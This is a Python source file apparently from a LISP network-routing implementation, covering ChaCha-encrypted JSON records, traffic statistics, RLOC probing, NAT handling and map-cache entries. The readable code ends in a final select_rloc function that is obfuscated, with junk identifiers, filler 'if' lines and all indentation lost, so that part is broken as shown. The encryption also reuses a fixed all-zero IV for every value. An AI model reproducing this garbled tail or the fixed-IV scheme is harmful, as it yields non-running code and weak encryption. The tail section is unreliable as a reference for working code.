        #
        # A map-server configured with json-keys encrypts the JSON string
        # with its first configured key.
        #
        if (len(lisp_ms_json_keys) != 0):
            if (ms_encrypt == False): return
            self.json_key_id = lisp_ms_json_keys.keys()[0]
            self.json_key = lisp_ms_json_keys[self.json_key_id]
            self.encrypt_json()

        #
        # lig decrypts received JSON when the LISP_JSON_KEY environment
        # variable is set, either as "<key>" or "[<key-id>]<key>".
        #
        if (lisp_log_id == "lig" and encrypted):
            env_key = os.getenv("LISP_JSON_KEY")
            if (env_key != None):
                index = -1
                if (env_key[0] == "[" and "]" in env_key):
                    index = env_key.find("]")
                    self.json_key_id = int(env_key[1:index])

                self.json_key = env_key[index+1::]
                self.decrypt_json()

    def add(self):
        self.delete()
        lisp_json_list[self.json_name] = self

    def delete(self):
        if (self.json_name in lisp_json_list):
            del(lisp_json_list[self.json_name])
            lisp_json_list[self.json_name] = None

    def print_json(self, html):
        good_string = self.json_string
        bad = "***"
        if (html): bad = red(bad, html)
        bad_string = bad + self.json_string + bad
        if (self.valid_json()): return(good_string)
        return(bad_string)

    def valid_json(self):
        try:
            json.loads(self.json_string)
        except:
            return(False)

        return(True)

    def encrypt_json(self):
        key = self.json_key.zfill(32)
        iv = "0" * 8

        json_dict = json.loads(self.json_string)
        for json_key in json_dict:
            value = json_dict[json_key]
            value = chacha.ChaCha(key, iv).encrypt(value)
            json_dict[json_key] = binascii.hexlify(value)

        self.json_string = json.dumps(json_dict)
        self.json_encrypted = True

    def decrypt_json(self):
        key = self.json_key.zfill(32)
        iv = "0" * 8

        json_dict = json.loads(self.json_string)
        for json_key in json_dict:
            value = binascii.unhexlify(json_dict[json_key])
            json_dict[json_key] = chacha.ChaCha(key, iv).encrypt(value)

        try:
            self.json_string = json.dumps(json_dict)
            self.json_encrypted = False
        except:
            pass

class lisp_stats():
    def __init__(self):
        self.packet_count = 0
        self.byte_count = 0
        self.last_rate_check = 0
        self.last_packet_count = 0
        self.last_byte_count = 0
        self.last_increment = None

    def increment(self, octets):
        self.packet_count += 1
        self.byte_count += octets
        self.last_increment = lisp_get_timestamp()

    def recent_packet_sec(self):
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 1)

    def recent_packet_min(self):
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 60)

    def stat_colors(self, c1, c2, html):
        if (self.recent_packet_sec()):
            return(green_last_sec(c1), green_last_sec(c2))

        if (self.recent_packet_min()):
            return(green_last_min(c1), green_last_min(c2))

        return(c1, c2)

    def normalize(self, count):
        count = str(count)
        digits = len(count)
        if (digits > 12):
            count = count[0:-10] + "." + count[-10:-7] + "T"
            return(count)

        if (digits > 9):
            count = count[0:-9] + "." + count[-9:-7] + "B"
            return(count)

        if (digits > 6):
            count = count[0:-6] + "." + count[-6] + "M"
            return(count)

        return(count)
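
    #
    # Illustrative values for normalize(): 1234567 renders as "1.2M",
    # 12345678901 as "12.34B", and 1234567890123 as "123.456T"; counts
    # of 6 or fewer digits are returned unchanged.
    #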
    def get_stats(self, summary, html):
        last_rate_check = self.last_rate_check
        last_packet_count = self.last_packet_count
        last_byte_count = self.last_byte_count
        self.last_rate_check = lisp_get_timestamp()
        self.last_packet_count = self.packet_count
        self.last_byte_count = self.byte_count

        #
        # Compute rates since the last call, in packets/sec and Mbps.
        #
        elapsed = self.last_rate_check - last_rate_check
        if (elapsed == 0):
            packet_rate = 0
            bit_rate = 0
        else:
            packet_rate = int((self.packet_count - last_packet_count) /
                elapsed)
            bit_rate = (self.byte_count - last_byte_count) / elapsed
            bit_rate = (bit_rate * 8) / 1000000
            bit_rate = round(bit_rate, 2)

        pcount = self.normalize(self.packet_count)
        bcount = self.normalize(self.byte_count)

        #
        # In summary form the counts go in a hover title and the rates in
        # the displayed string.
        #
        if (summary):
            separator = "<br>" if html else ""
            pcount, bcount = self.stat_colors(pcount, bcount, html)
            title = "packet-count: {}{}byte-count: {}".format(pcount,
                separator, bcount)
            stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format(
                packet_rate, bit_rate)

            if (html != ""): stats = lisp_span(title, stats)
        else:
            prate = str(packet_rate)
            brate = str(bit_rate)
            if (html):
                pcount = lisp_print_cour(pcount)
                prate = lisp_print_cour(prate)
                bcount = lisp_print_cour(bcount)
                brate = lisp_print_cour(brate)

            separator = "<br>" if html else ", "

            stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " +
                "{}{}bit-rate: {} mbps").format(pcount, separator, prate,
                separator, bcount, separator, brate)

        return(stats)

lisp_decap_stats = {
    "good-packets": lisp_stats(), "ICV-error": lisp_stats(),
    "checksum-error": lisp_stats(), "lisp-header-error": lisp_stats(),
    "no-decrypt-key": lisp_stats(), "bad-inner-version": lisp_stats(),
    "outer-header-error": lisp_stats()
}

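#
# A minimal usage sketch (illustrative, not from the original source):
# the decapsulation path picks the counter that matches the outcome of a
# packet and bumps it, e.g.:
#
#   lisp_decap_stats["checksum-error"].increment(len(packet))
#
# get_stats() can then render per-reason counters and rates for display.
#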
class lisp_rloc():
    def __init__(self, recurse=True):
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.rloc_name = None
        self.interface = None
        self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.translated_port = 0
        self.priority = 255
        self.weight = 0
        self.mpriority = 255
        self.mweight = 0
        self.uptime = 0
        self.state = LISP_RLOC_UP_STATE
        self.last_state_change = None
        self.rle_name = None
        self.elp_name = None
        self.geo_name = None
        self.json_name = None
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.stats = lisp_stats()
        self.last_rloc_probe = None
        self.last_rloc_probe_reply = None
        self.rloc_probe_rtt = -1
        self.recent_rloc_probe_rtts = [-1, -1, -1]
        self.rloc_probe_hops = "?/?"
        self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
        self.rloc_probe_latency = "?/?"
        self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
        self.last_rloc_probe_nonce = 0
        self.echo_nonce_capable = False
        self.map_notify_requested = False
        self.rloc_next_hop = None
        self.next_rloc = None
        self.multicast_rloc_probe_list = {}

        if (recurse == False): return

        #
        # When the underlay has multiple default routes, chain a deep
        # copy of this RLOC per additional next-hop via self.next_rloc so
        # each next-hop can be probed independently.
        #
        next_hops = lisp_get_default_route_next_hops()
        if (next_hops == [] or len(next_hops) == 1): return

        self.rloc_next_hop = next_hops[0]
        last = self
        for nh in next_hops[1::]:
            rloc = lisp_rloc(False)
            rloc = copy.deepcopy(self)
            rloc.rloc_next_hop = nh
            last.next_rloc = rloc
            last = rloc

    def up_state(self):
        return(self.state == LISP_RLOC_UP_STATE)

    def unreach_state(self):
        return(self.state == LISP_RLOC_UNREACH_STATE)

    def no_echoed_nonce_state(self):
        return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)

    def down_state(self):
        return(self.state in [LISP_RLOC_DOWN_STATE,
            LISP_RLOC_ADMIN_DOWN_STATE])

    def print_state(self):
        if (self.state is LISP_RLOC_UNKNOWN_STATE):
            return("unknown-state")
        if (self.state is LISP_RLOC_UP_STATE):
            return("up-state")
        if (self.state is LISP_RLOC_DOWN_STATE):
            return("down-state")
        if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
            return("admin-down-state")
        if (self.state is LISP_RLOC_UNREACH_STATE):
            return("unreach-state")
        if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
            return("no-echoed-nonce-state")
        return("invalid-state")

    def print_rloc(self, indent):
        uptime = lisp_print_elapsed(self.uptime)
        lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
            red(self.rloc.print_address(), False), uptime,
            self.print_state(), self.priority, self.weight, self.mpriority,
            self.mweight))

    def print_rloc_name(self, cour=False):
        if (self.rloc_name == None): return("")
        rloc_name = self.rloc_name
        if (cour): rloc_name = lisp_print_cour(rloc_name)
        return('rloc-name: {}'.format(blue(rloc_name, cour)))

    def store_rloc_from_record(self, rloc_record, nonce, source):
        port = LISP_DATA_PORT
        self.rloc.copy_address(rloc_record.rloc)
        self.rloc_name = rloc_record.rloc_name

        #
        # If the RLOC is behind a NAT, use the translated address and
        # port from stored NAT state.
        #
        rloc = self.rloc
        if (rloc.is_null() == False):
            nat_info = lisp_get_nat_info(rloc, self.rloc_name)
            if (nat_info):
                port = nat_info.port
                youngest = lisp_nat_state_info[self.rloc_name][0]
                addr_str = rloc.print_address_no_iid()
                rloc_str = red(addr_str, False)
                name_str = "" if self.rloc_name == None else \
                    blue(self.rloc_name, False)

                #
                # If the matched NAT state timed out, fall back to the
                # youngest stored entry, when it is a different one.
                #
                if (nat_info.timed_out()):
                    lprint(("    Matched stored NAT state timed out for " +
                        "RLOC {}:{}, {}").format(rloc_str, port, name_str))

                    nat_info = None if (nat_info == youngest) else youngest
                    if (nat_info and nat_info.timed_out()):
                        port = nat_info.port
                        rloc_str = red(nat_info.address, False)
                        lprint(("    Youngest stored NAT state timed out " +
                            " for RLOC {}:{}, {}").format(rloc_str, port,
                            name_str))
                        nat_info = None

                #
                # Use the translated RLOC from the NAT state entry.
                #
                if (nat_info):
                    if (nat_info.address != addr_str):
                        lprint("RLOC conflict, RLOC-record {}, NAT state {}".\
                            format(rloc_str, red(nat_info.address, False)))
                        self.rloc.store_address(nat_info.address)

                    rloc_str = red(nat_info.address, False)
                    port = nat_info.port
                    lprint("    Use NAT translated RLOC {}:{} for {}".\
                        format(rloc_str, port, name_str))
                    self.store_translated_rloc(rloc, port)

        self.geo = rloc_record.geo
        self.elp = rloc_record.elp
        self.json = rloc_record.json

        #
        # Store NAT translated encapsulation ports for RLE nodes.
        #
        self.rle = rloc_record.rle
        if (self.rle):
            for rle_node in self.rle.rle_nodes:
                rloc_name = rle_node.rloc_name
                nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
                if (nat_info == None): continue

                port = nat_info.port
                name_str = rloc_name
                if (name_str): name_str = blue(rloc_name, False)

                lprint(("    Store translated encap-port {} for RLE-" +
                    "node {}, rloc-name '{}'").format(port,
                    rle_node.address.print_address_no_iid(), name_str))
                rle_node.translated_port = port

        self.priority = rloc_record.priority
        self.mpriority = rloc_record.mpriority
        self.weight = rloc_record.weight
        self.mweight = rloc_record.mweight
        if (rloc_record.reach_bit and rloc_record.local_bit and
            rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE

        #
        # Store encapsulation keys supplied with the RLOC-record, but
        # only when the RLOC is the source of the Map-Reply.
        #
        rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
            source != None else None

        if (rloc_record.keys != None and rloc_is_source):
            key = rloc_record.keys[1]
            if (key != None):
                addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
                    str(port)

                key.add_key_by_rloc(addr_str, True)
                lprint("    Store encap-keys for nonce 0x{}, RLOC {}".format(
                    lisp_hex_string(nonce), red(addr_str, False)))

        return(port)

    def store_translated_rloc(self, rloc, port):
        self.rloc.copy_address(rloc)
        self.translated_rloc.copy_address(rloc)
        self.translated_port = port

    def is_rloc_translated(self):
        return(self.translated_rloc.is_null() == False)

    def rloc_exists(self):
        if (self.rloc.is_null() == False): return(True)
        if (self.rle_name or self.geo_name or self.elp_name or
            self.json_name):
            return(False)

        return(True)

    def is_rtr(self):
        #
        # An RTR RLOC carries priority 254, mpriority 255, and zero
        # weights.
        #
        return((self.priority == 254 and self.mpriority == 255 and
            self.weight == 0 and self.mweight == 0))

    def print_state_change(self, new_state):
        current_state = self.print_state()
        string = "{} -> {}".format(current_state, new_state)
        if (new_state == "up" and self.unreach_state()):
            string = bold(string, False)

        return(string)

    def print_rloc_probe_rtt(self):
        if (self.rloc_probe_rtt == -1): return("none")
        return(self.rloc_probe_rtt)

    def print_recent_rloc_probe_rtts(self):
        rtts = str(self.recent_rloc_probe_rtts)
        rtts = rtts.replace("-1", "?")
        return(rtts)

    def compute_rloc_probe_rtt(self):
        last_rtt = self.rloc_probe_rtt
        self.rloc_probe_rtt = -1
        if (self.last_rloc_probe_reply == None): return
        if (self.last_rloc_probe == None): return
        self.rloc_probe_rtt = self.last_rloc_probe_reply - \
            self.last_rloc_probe
        self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
        recent = self.recent_rloc_probe_rtts
        self.recent_rloc_probe_rtts = [last_rtt] + recent[0:-1]

    def print_rloc_probe_hops(self):
        return(self.rloc_probe_hops)

    def print_recent_rloc_probe_hops(self):
        hops = str(self.recent_rloc_probe_hops)
        return(hops)

    def store_rloc_probe_hops(self, to_hops, from_ttl):
        #
        # A zero hop count renders as "?" and a remaining TTL below half
        # the probe TTL as "!"; otherwise the hop count is the probe TTL
        # minus the remaining TTL.
        #
        if (to_hops == 0):
            to_hops = "?"
        elif (to_hops < LISP_RLOC_PROBE_TTL / 2):
            to_hops = "!"
        else:
            to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)

        if (from_ttl < LISP_RLOC_PROBE_TTL / 2):
            from_hops = "!"
        else:
            from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)

        last_hops = self.rloc_probe_hops
        self.rloc_probe_hops = to_hops + "/" + from_hops
        recent = self.recent_rloc_probe_hops
        self.recent_rloc_probe_hops = [last_hops] + recent[0:-1]

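    #
    # Worked example (illustrative, assuming LISP_RLOC_PROBE_TTL were
    # 64): a probe whose reply reports a remaining to_hops of 61 and
    # arrives with from_ttl 60 is recorded as "3/4" -- 3 hops toward the
    # RLOC and 4 hops back.
    #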
    def store_rloc_probe_latencies(self, json_telemetry):
        telemetry = lisp_decode_telemetry(json_telemetry)

        #
        # One-way latencies: forward is etr-in minus itr-out, reverse is
        # itr-in minus etr-out.
        #
        forward = round(float(telemetry["etr-in"]) -
            float(telemetry["itr-out"]), 3)
        reverse = round(float(telemetry["itr-in"]) -
            float(telemetry["etr-out"]), 3)

        last_latency = self.rloc_probe_latency
        self.rloc_probe_latency = str(forward) + "/" + str(reverse)
        recent = self.recent_rloc_probe_latencies
        self.recent_rloc_probe_latencies = [last_latency] + recent[0:-1]

    def print_rloc_probe_latency(self):
        return(self.rloc_probe_latency)

    def print_recent_rloc_probe_latencies(self):
        latencies = str(self.recent_rloc_probe_latencies)
        return(latencies)

    def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
        #
        # Find the RLOC (possibly on the next-hop chain) that sent the
        # probe carrying this nonce.
        #
        rloc = self
        while (True):
            if (rloc.last_rloc_probe_nonce == nonce): break
            rloc = rloc.next_rloc
            if (rloc == None):
                lprint("    No matching nonce state found for nonce 0x{}".\
                    format(lisp_hex_string(nonce)))
                return

        #
        # Compute the RTT and bring the RLOC up, pushing the map-cache
        # entry to the data-plane on a state change.
        #
        rloc.last_rloc_probe_reply = ts
        rloc.compute_rloc_probe_rtt()
        state_change = rloc.print_state_change("up")
        if (rloc.state != LISP_RLOC_UP_STATE):
            lisp_update_rtr_updown(rloc.rloc, True)
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()
            mc = lisp_map_cache.lookup_cache(eid, True)
            if (mc): lisp_write_ipc_map_cache(True, mc)

        #
        # Store the hop counts in each direction.
        #
        rloc.store_rloc_probe_hops(hc, ttl)

        #
        # Store one-way latencies when telemetry was returned.
        #
        if (jt): rloc.store_rloc_probe_latencies(jt)

        probe = bold("RLOC-probe reply", False)
        addr_str = rloc.rloc.print_address_no_iid()
        rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
        port_str = ":{}".format(self.translated_port) if \
            self.translated_port != 0 else ""

        nh = ""
        if (rloc.rloc_next_hop != None):
            device, gateway = rloc.rloc_next_hop
            nh = ", nh {}({})".format(gateway, device)

        latency = bold(rloc.print_rloc_probe_latency(), False)
        latency = ", latency {}".format(latency) if jt else ""

        eid_str = green(lisp_print_eid_tuple(eid, group), False)

        lprint(("    Received {} from {}{} for {}, {}, rtt {}{}, " +
            "to-ttl/from-ttl {}{}").format(probe, red(addr_str, False),
            port_str, eid_str, state_change, rtt, nh,
            str(hc) + "/" + str(ttl), latency))

        if (rloc.rloc_next_hop == None): return

        #
        # Among the next-hop chained RLOCs that are up, find the best RTT
        # and install a host route through its next-hop.
        #
        rloc = None
        best = None
        while (True):
            rloc = self if rloc == None else rloc.next_rloc
            if (rloc == None): break
            if (rloc.up_state() == False): continue
            if (rloc.rloc_probe_rtt == -1): continue

            if (best == None): best = rloc
            if (rloc.rloc_probe_rtt < best.rloc_probe_rtt): best = rloc

        if (best != None):
            device, gateway = best.rloc_next_hop
            nh = bold("nh {}({})".format(gateway, device), False)
            lprint("    Install host-route via best {}".format(nh))
            lisp_install_host_route(addr_str, None, False)
            lisp_install_host_route(addr_str, gateway, True)

    def add_to_rloc_probe_list(self, eid, group):
        addr_str = self.rloc.print_address_no_iid()
        port = self.translated_port
        if (port != 0): addr_str += ":" + str(port)

        if (addr_str not in lisp_rloc_probe_list):
            lisp_rloc_probe_list[addr_str] = []

        #
        # Replace any stale entry for the same EID/group.
        #
        if (group.is_null()): group.instance_id = 0
        for rloc, e, g in lisp_rloc_probe_list[addr_str]:
            if (e.is_exact_match(eid) and g.is_exact_match(group)):
                if (rloc == self):
                    if (lisp_rloc_probe_list[addr_str] == []):
                        lisp_rloc_probe_list.pop(addr_str)

                    return

                lisp_rloc_probe_list[addr_str].remove([rloc, e, g])
                break

        lisp_rloc_probe_list[addr_str].append([self, eid, group])

        #
        # Inherit unreachability state from the first RLOC on the list.
        #
        rloc = lisp_rloc_probe_list[addr_str][0][0]
        if (rloc.state == LISP_RLOC_UNREACH_STATE):
            self.state = LISP_RLOC_UNREACH_STATE
            self.last_state_change = lisp_get_timestamp()

    def delete_from_rloc_probe_list(self, eid, group):
        addr_str = self.rloc.print_address_no_iid()
        port = self.translated_port
        if (port != 0): addr_str += ":" + str(port)
        if (addr_str not in lisp_rloc_probe_list): return

        entry = []
        for e in lisp_rloc_probe_list[addr_str]:
            if (e[0] != self): continue
            if (e[1].is_exact_match(eid) == False): continue
            if (e[2].is_exact_match(group) == False): continue
            entry = e
            break

        if (entry == []): return

        try:
            lisp_rloc_probe_list[addr_str].remove(entry)
            if (lisp_rloc_probe_list[addr_str] == []):
                lisp_rloc_probe_list.pop(addr_str)
        except:
            return

    def print_rloc_probe_state(self, trailing_linefeed):
        output = ""
        rloc = self
        while (True):
            sent = rloc.last_rloc_probe
            if (sent == None): sent = 0
            received = rloc.last_rloc_probe_reply
            if (received == None): received = 0
            rtt = rloc.print_rloc_probe_rtt()
            indent = space(4)

            if (rloc.rloc_next_hop == None):
                output += "RLOC-Probing:\n"
            else:
                device, gateway = rloc.rloc_next_hop
                output += "RLOC-Probing for nh {}({}):\n".format(gateway,
                    device)

            output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " +
                "received: {}, rtt {}").format(indent,
                lisp_print_elapsed(sent), indent,
                lisp_print_elapsed(received), rtt)

            if (trailing_linefeed): output += "\n"

            rloc = rloc.next_rloc
            if (rloc == None): break
            output += "\n"

        return(output)

    def get_encap_keys(self):
        #
        # 4341 is the LISP data port used when no NAT translation is in
        # place.
        #
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.rloc.print_address_no_iid() + ":" + port

        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except:
            return(None, None)

    def rloc_recent_rekey(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.rloc.print_address_no_iid() + ":" + port

        try:
            key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
            if (key == None): return(False)
            if (key.last_rekey == None): return(True)
            return(time.time() - key.last_rekey < 1)
        except:
            return(False)

class lisp_mapping():
    def __init__(self, eid, group, rloc_set):
        self.eid = eid
        if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = group
        if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.rloc_set = rloc_set
        self.best_rloc_set = []
        self.build_best_rloc_set()
        self.uptime = lisp_get_timestamp()
        self.action = LISP_NO_ACTION
        self.expires = None
        self.map_cache_ttl = None
        self.last_refresh_time = self.uptime
        self.source_cache = None
        self.map_replies_sent = 0
        self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.use_mr_name = "all"
        self.use_ms_name = "all"
        self.stats = lisp_stats()
        self.dynamic_eids = None
        self.checkpoint_entry = False
        self.secondary_iid = None
        self.signature_eid = False
        self.gleaned = False
        self.recent_sources = {}
        self.last_multicast_map_request = 0

    def print_mapping(self, eid_indent, rloc_indent):
        uptime = lisp_print_elapsed(self.uptime)
        group_str = "" if self.group.is_null() else \
            ", group {}".format(self.group.print_prefix())

        lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
            green(self.eid.print_prefix(), False), group_str, uptime,
            len(self.rloc_set)))
        for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))

    def print_ttl(self):
        ttl = self.map_cache_ttl
        if (ttl == None): return("forever")

        #
        # The TTL is kept in seconds; render it in hours or minutes when
        # it divides evenly (the original read "ttl * 60" here, which is
        # inconsistent with the minutes conversion below).
        #
        if (ttl >= 3600):
            if ((ttl % 3600) == 0):
                ttl = str(ttl / 3600) + " hours"
            else:
                ttl = str(ttl / 60) + " mins"
        elif (ttl >= 60):
            if ((ttl % 60) == 0):
                ttl = str(ttl / 60) + " mins"
            else:
                ttl = str(ttl) + " secs"
        else:
            ttl = str(ttl) + " secs"

        return(ttl)

    def refresh(self):
        if (self.group.is_null()): return(self.refresh_unicast())
        return(self.refresh_multicast())

    def refresh_unicast(self):
        return(self.is_active() and self.has_ttl_elapsed() and
            self.gleaned == False)

    def refresh_multicast(self):
        #
        # Refresh a multicast entry at each TTL boundary, allowing a
        # couple of seconds of timer slop.
        #
        elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
        refresh = (elapsed in [0, 1, 2])
        if (refresh == False): return(False)

        #
        # Rate-limit to one refreshing Map-Request every 2 seconds.
        #
        rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
        if (rate_limit): return(False)

        self.last_multicast_map_request = lisp_get_timestamp()
        return(True)

    def has_ttl_elapsed(self):
        if (self.map_cache_ttl == None): return(False)
        elapsed = time.time() - self.last_refresh_time
        if (elapsed >= self.map_cache_ttl): return(True)

        #
        # Treat the TTL as elapsed once within 10% of expiry so the
        # entry can be refreshed before it actually times out.
        #
        refresh_time = self.map_cache_ttl - (self.map_cache_ttl / 10)
        if (elapsed >= refresh_time): return(True)
        return(False)

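    #
    # Example (illustrative): with a map_cache_ttl of 3600 seconds, the
    # TTL reports as elapsed after 3600 - 360 = 3240 seconds, i.e. at 90%
    # of the TTL, leaving time for a refreshing Map-Request before the
    # entry expires.
    #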
    def is_active(self):
        if (self.stats.last_increment == None): return(False)
        elapsed = time.time() - self.stats.last_increment
        return(elapsed <= 60)

    def match_eid_tuple(self, db):
        if (self.eid.is_exact_match(db.eid) == False): return(False)
        if (self.group.is_exact_match(db.group) == False): return(False)
        return(True)

    def sort_rloc_set(self):
        self.rloc_set.sort(key=operator.attrgetter('rloc.address'))

    def delete_rlocs_from_rloc_probe_list(self):
        for rloc in self.best_rloc_set:
            rloc.delete_from_rloc_probe_list(self.eid, self.group)

    def build_best_rloc_set(self):
        old_best = self.best_rloc_set
        self.best_rloc_set = []
        if (self.rloc_set == None): return

        #
        # Find the best (numerically lowest) priority among RLOCs in up
        # state.
        #
        best_priority = 256
        for rloc in self.rloc_set:
            if (rloc.up_state()):
                best_priority = min(rloc.priority, best_priority)

        #
        # Keep every RLOC at the best priority. Give an unreachable RLOC
        # with no probe timestamp one now, so it is RLOC-probed right
        # away.
        #
        for rloc in self.rloc_set:
            if (rloc.priority <= best_priority):
                if (rloc.unreach_state() and rloc.last_rloc_probe == None):
                    rloc.last_rloc_probe = lisp_get_timestamp()

                self.best_rloc_set.append(rloc)

        #
        # Maintain the RLOC-probe list: remove RLOCs that fell out of the
        # best set and (re)add the members of the new one.
        #
        for rloc in old_best:
            if (rloc.priority < best_priority): continue
            rloc.delete_from_rloc_probe_list(self.eid, self.group)

        for rloc in self.best_rloc_set:
            if (rloc.rloc.is_null()): continue
            rloc.add_to_rloc_probe_list(self.eid, self.group)

def select_rloc ( self , lisp_packet , ipc_socket ) :
IiiiIi1iiii11 = lisp_packet . packet
ooO00O = lisp_packet . inner_version
IiiI1iii1iIiiI = len ( self . best_rloc_set )
if ( IiiI1iii1iIiiI == 0 ) :
self . stats . increment ( len ( IiiiIi1iiii11 ) )
return ( [ None , None , None , self . action , None , None ] )
if 58 - 58: OoO0O00
if 48 - 48: oO0o . II111iiii
oOOO0O0ooOoOoo0 = 4 if lisp_load_split_pings else 0
IIi1iiIIi1i = lisp_packet . hash_ports ( )
if ( ooO00O == 4 ) :
for IiIIi1IiiIiI in range ( 8 + oOOO0O0ooOoOoo0 ) :
IIi1iiIIi1i = IIi1iiIIi1i ^ struct . unpack ( "B" , IiiiIi1iiii11 [ IiIIi1IiiIiI + 12 ] ) [ 0 ]
if 73 - 73: OoOoOO00
elif ( ooO00O == 6 ) :
for IiIIi1IiiIiI in range ( 0 , 32 + oOOO0O0ooOoOoo0 , 4 ) :
IIi1iiIIi1i = IIi1iiIIi1i ^ struct . unpack ( "I" , IiiiIi1iiii11 [ IiIIi1IiiIiI + 8 : IiIIi1IiiIiI + 12 ] ) [ 0 ]
if 42 - 42: I1ii11iIi11i - iIii1I11I1II1 . Ii1I % OoO0O00 % i11iIiiIii * i11iIiiIii
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) + ( IIi1iiIIi1i & 0xffff )
IIi1iiIIi1i = ( IIi1iiIIi1i >> 8 ) + ( IIi1iiIIi1i & 0xff )
else :
for IiIIi1IiiIiI in range ( 0 , 12 + oOOO0O0ooOoOoo0 , 4 ) :
IIi1iiIIi1i = IIi1iiIIi1i ^ struct . unpack ( "I" , IiiiIi1iiii11 [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] ) [ 0 ]
if 86 - 86: Oo0Ooo % iIii1I11I1II1 . II111iiii / I11i % OoO0O00 % OoO0O00
if 40 - 40: o0oOOo0O0Ooo . iIii1I11I1II1 * Oo0Ooo * i1IIi
if 94 - 94: oO0o - II111iiii + OoOoOO00
if ( lisp_data_plane_logging ) :
oOOO000 = [ ]
for O0OOOO0o0O in self . best_rloc_set :
if ( O0OOOO0o0O . rloc . is_null ( ) ) : continue
oOOO000 . append ( [ O0OOOO0o0O . rloc . print_address_no_iid ( ) , O0OOOO0o0O . print_state ( ) ] )
if 72 - 72: iIii1I11I1II1 % I1Ii111
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( IIi1iiIIi1i ) , IIi1iiIIi1i % IiiI1iii1iIiiI , red ( str ( oOOO000 ) , False ) ) )
if 77 - 77: I1Ii111 * I1IiiI / iIii1I11I1II1 . II111iiii * Oo0Ooo
if 71 - 71: ooOoO0o / iIii1I11I1II1 % O0 / I1ii11iIi11i . I1Ii111 / i11iIiiIii
if 6 - 6: oO0o . OoO0O00 - II111iiii . I1IiiI - o0oOOo0O0Ooo - i1IIi
if 42 - 42: Ii1I + i11iIiiIii
if 46 - 46: O0 % OoOoOO00 - I1Ii111 . I1IiiI
if 66 - 66: II111iiii * iIii1I11I1II1 * ooOoO0o * I11i . II111iiii - ooOoO0o
I1IIiIIIii = self . best_rloc_set [ IIi1iiIIi1i % IiiI1iii1iIiiI ]
if 15 - 15: I1ii11iIi11i - i11iIiiIii - Ii1I / Ii1I . iII111i
if 36 - 36: oO0o + Oo0Ooo * I1Ii111 % OOooOOo . Oo0Ooo . I1IiiI
if 81 - 81: o0oOOo0O0Ooo . OoOoOO00 . i11iIiiIii
if 13 - 13: i1IIi
if 70 - 70: O0 / II111iiii
ii1 = lisp_get_echo_nonce ( I1IIiIIIii . rloc , None )
if ( ii1 ) :
ii1 . change_state ( I1IIiIIIii )
if ( I1IIiIIIii . no_echoed_nonce_state ( ) ) :
ii1 . request_nonce_sent = None
if 98 - 98: OoOoOO00 - O0 . O0 + ooOoO0o * iIii1I11I1II1
if 7 - 7: IiII * OoOoOO00 + iIii1I11I1II1 / OoOoOO00 + Oo0Ooo / o0oOOo0O0Ooo
if 77 - 77: i1IIi . I1IiiI
if 59 - 59: O0 + OoooooooOO - i1IIi
if 87 - 87: IiII * OoooooooOO / Oo0Ooo % iIii1I11I1II1 % oO0o
if 97 - 97: ooOoO0o % i1IIi . IiII / Oo0Ooo . I1Ii111 . OoO0O00
if ( I1IIiIIIii . up_state ( ) == False ) :
i1iIiI = IIi1iiIIi1i % IiiI1iii1iIiiI
ooo = ( i1iIiI + 1 ) % IiiI1iii1iIiiI
while ( ooo != i1iIiI ) :
I1IIiIIIii = self . best_rloc_set [ ooo ]
if ( I1IIiIIIii . up_state ( ) ) : break
ooo = ( ooo + 1 ) % IiiI1iii1iIiiI
if 22 - 22: i11iIiiIii * II111iiii
if ( ooo == i1iIiI ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
if 11 - 11: Oo0Ooo % i1IIi
if 70 - 70: II111iiii * Oo0Ooo * OOooOOo - I1IiiI + iIii1I11I1II1 + ooOoO0o
if 27 - 27: I1ii11iIi11i - I1Ii111 * O0 % ooOoO0o / I1IiiI
if 53 - 53: i11iIiiIii * i11iIiiIii % O0 % IiII
if 57 - 57: I1IiiI % i1IIi * OoO0O00 + I1Ii111 . I11i % I11i
if 69 - 69: I1ii11iIi11i / OoOoOO00 + iIii1I11I1II1
I1IIiIIIii . stats . increment ( len ( IiiiIi1iiii11 ) )
